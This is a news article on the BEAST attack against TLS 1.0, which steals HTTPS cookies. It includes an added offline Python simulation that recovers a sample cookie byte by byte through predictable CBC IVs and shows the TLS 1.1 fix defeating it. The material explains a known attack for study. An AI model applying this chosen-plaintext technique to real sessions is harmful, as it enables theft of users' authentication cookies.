
Security researchers presenting exploit for TLS-gap

The security researchers Juliano Rizzo and Thai Duong have developed an exploit for a vulnerability in a widely used technique for encrypting web traffic. They call their code BEAST, which, according to a post on Kaspersky's Threatpost blog, stands for "Browser Exploit Against SSL/TLS".

According to Rizzo and Duong, the flaw lies in version 1.0 of Transport Layer Security (TLS), the encryption protocol used when web sites are accessed over HTTPS. TLS is the successor to Secure Sockets Layer (SSL). It is used above all by banks' web sites and by companies such as Google, Facebook and Twitter. Later protocol versions (TLS 1.1 and 1.2) are not affected by this particular weakness.

Rizzo and Duong will present their exploit on Friday at the Ekoparty hacker conference in Argentina. "We also describe an application of the attack to obtain authentication tokens and cookies from HTTPS requests and decode them efficiently," Rizzo wrote. "Our exploit uses a vulnerability that currently exists in the SSL/TLS implementation of major web browsers."

According to Threatpost, BEAST works by getting the victim's browser to run JavaScript code that cooperates with a sniffer monitoring the user's network traffic. The JavaScript can also be delivered indirectly, for example through an iframe advertisement. With this method the attacker can capture an authentication cookie, the small piece of data by which a web server recognises that a user is already logged in.
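The article describes the attack only at the level of "JavaScript plus a sniffer". The simulation below is an added example, not code from the article or from Rizzo and Duong's BEAST tool, and shows the cryptographic step behind it: the CBC cipher suites of TLS 1.0 use the last ciphertext block of one record as the IV of the next, so an attacker who can inject a chosen plaintext block at the start of a record can test one guess per record for a single unknown byte of the cookie. Assumptions made so that it runs offline: the block cipher is a keyed-hash stand-in rather than AES (the attack uses only the cipher's determinism), the record MAC is omitted, and the cookie value is constructed. A sender with a fresh IV per record, as TLS 1.1 introduced, is included to show the same attack failing.

```python
import hashlib
import os

BLOCK = 16
SECRET_COOKIE = b"sessionid=7f3a9c2e1b4d"  # constructed sample cookie (22 bytes)


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for the AES-128 encryption direction (assumption: a keyed hash,
    not a real cipher). BEAST relies only on the block function being
    deterministic for a fixed key, which holds for real AES-CBC as well."""
    assert len(block) == BLOCK
    return hashlib.sha256(key + block).digest()[:BLOCK]


def xor_blocks(*blocks: bytes) -> bytes:
    out = bytearray(BLOCK)
    for b in blocks:
        for j in range(BLOCK):
            out[j] ^= b[j]
    return bytes(out)


def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


class CbcRecordSender:
    """Sender side of a CBC record layer (MAC omitted for brevity).

    chained_iv=True  -> TLS 1.0 behaviour: the IV of record N+1 is the last
                        ciphertext block of record N (the BEAST precondition).
    chained_iv=False -> TLS 1.1+ behaviour: a fresh random IV for every record.
    """

    def __init__(self, key: bytes, secret: bytes, chained_iv: bool = True):
        self.key = key
        self.secret = secret
        self.chained_iv = chained_iv
        self.last_block = os.urandom(BLOCK)  # initial IV, unknown to the attacker

    def send(self, attacker_prefix: bytes) -> bytes:
        """The victim's browser sends attacker-controlled bytes (injected via
        JavaScript) followed by the secret cookie. Returns what the sniffer sees."""
        plaintext = pad(attacker_prefix + self.secret)
        prev = self.last_block if self.chained_iv else os.urandom(BLOCK)
        out = []
        for i in range(0, len(plaintext), BLOCK):
            prev = block_encrypt(self.key, xor_blocks(plaintext[i:i + BLOCK], prev))
            out.append(prev)
        self.last_block = prev
        return b"".join(out)


def beast_recover(victim: CbcRecordSender, secret_len: int) -> bytes:
    """Attacker side: chooses the prefix of each record and observes all ciphertext.

    For secret byte i, pick a prefix length so that byte i becomes the last byte
    of a block whose other 15 bytes are already known. For each guess g, send a
    chosen first block P' = (known + g) XOR C[t-1] XOR IV_next, where IV_next is
    the last ciphertext block the sniffer just saw. The victim then encrypts
    E(P' XOR IV_next) = E((known + g) XOR C[t-1]), which equals the target block
    C[t] exactly when g is the secret byte.
    """
    last = victim.send(b"")  # warm-up record: reveals the IV of the next record
    recovered = b""
    for i in range(secret_len):
        pad_len = (BLOCK - 1 - i) % BLOCK
        prefix = b"A" * pad_len
        t = (pad_len + i) // BLOCK  # index of the block holding secret byte i
        iv_of_record = last[-BLOCK:]
        ct = victim.send(prefix)
        c_target = ct[t * BLOCK:(t + 1) * BLOCK]
        c_prev = ct[(t - 1) * BLOCK:t * BLOCK] if t > 0 else iv_of_record
        known = (prefix + recovered)[t * BLOCK:t * BLOCK + BLOCK - 1]
        last = ct
        found = None
        for g in range(256):
            chosen = xor_blocks(known + bytes([g]), c_prev, last[-BLOCK:])
            last = victim.send(chosen)
            if last[:BLOCK] == c_target:
                found = g
                break
        if found is None:
            raise RuntimeError(f"no guess matched for byte {i}: IV was not predictable")
        recovered += bytes([found])
    return recovered


def run_demo() -> bytes:
    """TLS 1.0-style chained IVs: the whole cookie is recovered byte by byte."""
    victim = CbcRecordSender(os.urandom(16), SECRET_COOKIE, chained_iv=True)
    return beast_recover(victim, len(SECRET_COOKIE))


def attack_fails_with_fresh_iv() -> bool:
    """TLS 1.1-style per-record IV: the chosen block can no longer cancel the IV,
    so no guess matches and the attack aborts on the very first byte."""
    victim = CbcRecordSender(os.urandom(16), SECRET_COOKIE, chained_iv=False)
    try:
        beast_recover(victim, len(SECRET_COOKIE))
    except RuntimeError:
        return True
    return False


if __name__ == "__main__":
    print(run_demo())
    print("attack fails against fresh IVs:", attack_fails_with_fresh_iv())
```

Each secret byte costs at most 256 records (128 on average), which is why the real attack needs the victim's browser to generate a large volume of requests under script control and why the researchers quote minutes rather than seconds per cookie. The fresh-IV variant is the same fix that TLS 1.1 applied; the other common mitigation at the time was to prefer a stream cipher suite such as RC4 on TLS 1.0 connections.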

The Register reports that the researchers will demonstrate their exploit by decrypting the cookie that controls access to a PayPal payment page. According to Rizzo, carrying out the attack currently takes about ten minutes.

Nevertheless, Adam Langley, a TLS expert at Google, is not worried. "The security researchers have made BEAST available to browser vendors, so I will not speak about it in detail until the code is public. It is very neat, but not something you need to worry about," Langley wrote on Twitter.

Security researcher Karsten Nohl of the University of Virginia said the exploit combines two areas of security work: "Cryptanalysis and client-side attacks, in which case a well-known client-side problem, namely that web sites are not screened off from one another, is used to counter an assumption of cryptography: that a user's own computer will not attack him."
